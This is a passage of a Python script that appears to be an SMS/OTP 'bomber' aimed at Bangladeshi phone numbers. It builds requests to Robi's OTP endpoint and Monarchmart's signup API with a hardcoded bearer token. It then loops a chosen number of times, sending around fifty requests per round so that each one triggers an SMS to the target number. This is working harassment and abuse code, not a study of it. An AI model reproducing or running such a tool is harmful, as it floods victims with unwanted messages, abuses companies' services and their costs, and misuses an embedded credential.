headers43["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"



data43 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"9358cd85-e111-4fe9-8e61-c8fb013348e4"}'




url44 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers44 = CaseInsensitiveDict()


headers44["Content-Type"] = "application/json"

headers44["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDYwMjE1NiwiZXhwIjoxNjU0Njg4NTU2LCJuYmYiOjE2NTQ2MDIxNTYsImp0aSI6IjNiMDR0RmhpMEcwb3JMQ2EiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.3NUcW73QlxA8-cfpwZAf4swNp5xG6SeKNxqi4iv-o8I"




data44 = '{"phone_number":"'+number+'","lang":"bn","type":"internet_package","plan_type":"internet_package","uid":"20b7088f-408a-4c0a-914b-6421a8fa5feb"}'

url45 = "https://monarchmart.com/api/v2/auth/signup"
headers45 = CaseInsensitiveDict()
headers45["Content-Type"] = "application/json"

data45 = """{\"name\":\"\",\"email_or_phone\":\"+88"""+number+"""\",\"pass word\":\"\",\"register_by\":\"phone\"}"""

url46 = "https://monarchmart.com/api/v2/auth/signup"
headers46 = CaseInsensitiveDict()
headers46["Content-Type"] = "application/json"

data46 = """{\"name\":\"\",\"email_or_phone\":\"+88"""+number+"""\",\"pass word\":\"\",\"register_by\":\"phone\"}"""

url47 = "https://monarchmart.com/api/v2/auth/signup"
headers47 = CaseInsensitiveDict()
headers47["Content-Type"] = "application/json"

data47 = """{\"name\":\"\",\"email_or_phone\":\"+88"""+number+"""\",\"pass word\":\"\",\"register_by\":\"phone\"}"""

url48 = "https://monarchmart.com/api/v2/auth/signup"
headers48 = CaseInsensitiveDict()
headers48["Content-Type"] = "application/json"

data48 = """{\"name\":\"\",\"email_or_phone\":\"+88"""+number+"""\",\"pass word\":\"\",\"register_by\":\"phone\"}"""

url49 = "https://monarchmart.com/api/v2/auth/signup"
headers49 = CaseInsensitiveDict()
headers49["Content-Type"] = "application/json"

data49 = """{\"name\":\"\",\"email_or_phone\":\"+88"""+number+"""\",\"pass word\":\"\",\"register_by\":\"phone\"}"""

url50 = "https://monarchmart.com/api/v2/auth/signup"
headers50 = CaseInsensitiveDict()
headers50["Content-Type"] = "application/json"

data50 = """{\"name\":\"\",\"email_or_phone\":\"+88"""+number+"""\",\"pass word\":\"\",\"register_by\":\"phone\"}"""

for i in range(amount):
	try:
		resp1 = requests.post(url1, headers=headers1, data=data1)

		
		resp2 = requests.post(url2, headers=headers2, data=data2)				
								
	
		
		resp3 = requests.post(url3, headers=headers3, data=data3)
		
		resp4 = requests.post(url4, headers=headers4, data=data4)

		resp5 = requests.post(url5, headers=headers5, data=data5)
		
		resp6 = requests.post(url6, headers=headers5, data=data6)
		
		resp7 = requests.post(url7, headers=headers7, data=data7)
		
		resp8 = requests.post(url8, headers=headers8, data=data8)
		
		resp9 = requests.post(url9, headers=headers9, data=data9)
		
		resp10 = requests.post(url10, headers=headers10, data=data10)
		
		resp11 = requests.post(url11, headers=headers11, data=data11)
		
		resp12 = requests.post(url12, headers=headers12, data=data12)
		
		resp13 = requests.post(url13, headers=headers13, data=data13)
		
		resp14 = requests.post(url14, headers=headers14, data=data14)
		
		resp15 = requests.post(url15, headers=headers15, data=data15)
		
		resp16 = requests.get(url15)
		
		resp17 = requests.get(url17)
		
		resp18 = requests.get(url18)
		
		resp19 = requests.get(url19)
		
		resp20 = requests.get(url20)
		
		resp21 = requests.post(url21, headers=headers21, data=data31)

		
		resp22 = requests.post(url22, headers=headers22, data=data22)				
								
		resp23 = requests.post(url23, headers=headers23, data=data23)
		
		resp24 = requests.post(url24, headers=headers24, data=data24)

		resp25 = requests.post(url25, headers=headers25, data=data25)
		
		resp26 = requests.post(url26, headers=headers26, data=data26)
		
		resp27 = requests.post(url27, headers=headers27, data=data27)
		
		resp28 = requests.post(url28, headers=headers28, data=data28)
		
		resp29 = requests.post(url29, headers=headers29, data=data29)
		
		resp30 = requests.post(url30, headers=headers30, data=data30)
		
		resp31 = requests.post(url31, headers=headers31, data=data31)
		
		resp32 = requests.post(url32, headers=headers32, data=data32)
		
		resp33 = requests.post(url33, headers=headers33, data=data33)
		
		resp34 = requests.post(url34, headers=headers34, data=data34)
		
		resp35 = requests.post(url35, headers=headers35, data=data35)
		
		resp36 = requests.post(url36, headers=headers36, data=data36)
		
		resp37 = requests.post(url37, headers=headers37, data=data37)
		
		resp38 = requests.post(url38, headers=headers38, data=data38)
		
		resp39 = requests.post(url39, headers=headers39, data=data39)
		
		resp40 = requests.post(url40, headers=headers40, data=data40)
		
		resp41 = requests.post(url41, headers=headers41, data=data41)
		
		resp22 = requests.post(url22, headers=headers42, data=data42)
		
		resp43 = requests.post(url43, headers=headers43, data=data43)
		
		resp44 = requests.post(url44, headers=headers44, data=data44)
		
		resp45 = requests.post(url45, headers=headers45, data = data45)
		
		resp46 = requests.post(url46, headers=headers46, data = data46)
		
		resp47 = requests.post(url47, headers=headers47, data = data47)
		
		resp48 = requests.post(url48, headers=headers48, data = data48)
		
		resp49 = requests.post(url49, headers=headers49, data = data49)
		
		resp50 = requests.post(url50, headers=headers50, data = data50)
		
		print(str (i+1)+"  PuDiNa SiiR PiiN SeNT HoYeChE \n")
	except:
		print ("Please Make Sure Your Internet Connection")
